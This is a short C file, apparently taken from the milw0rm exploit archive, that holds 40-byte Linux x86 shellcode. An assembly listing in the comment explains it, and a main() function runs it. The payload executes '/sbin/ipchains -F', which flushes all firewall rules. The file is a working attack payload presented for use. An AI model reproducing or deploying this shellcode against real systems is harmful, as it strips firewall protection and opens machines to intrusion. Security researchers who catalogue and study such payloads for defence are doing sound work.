45 lines
No EOL
906 B
C
45 lines
No EOL
906 B
C
/* By Kris Katterjohn 11/18/2006
|
|
*
|
|
* 40 byte shellcode to flush ipchains for Linux x86
|
|
*
|
|
*
|
|
*
|
|
* section .text
|
|
*
|
|
* global _start
|
|
*
|
|
* _start:
|
|
*
|
|
* ; execve("/sbin/ipchains", { "/sbin/ipchains", "-F", NULL }, NULL)
|
|
*
|
|
* push byte 11
|
|
* pop eax
|
|
* cdq
|
|
* push edx
|
|
* push word 0x462d
|
|
* mov ecx, esp
|
|
* push edx
|
|
* push word 0x736e
|
|
* push 0x69616863
|
|
* push 0x70692f6e
|
|
* push 0x6962732f
|
|
* mov ebx, esp
|
|
* push edx
|
|
* push ecx
|
|
* push ebx
|
|
* mov ecx, esp
|
|
* int 0x80
|
|
*/
|
|
|
|
main()
|
|
{
|
|
char shellcode[] =
|
|
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x46\x89"
|
|
"\xe1\x52\x66\x68\x6e\x73\x68\x63\x68\x61"
|
|
"\x69\x68\x6e\x2f\x69\x70\x68\x2f\x73\x62"
|
|
"\x69\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
|
|
|
|
(*(void (*)()) shellcode)();
|
|
}
|
|
|
|
// milw0rm.com [2006-11-17]
|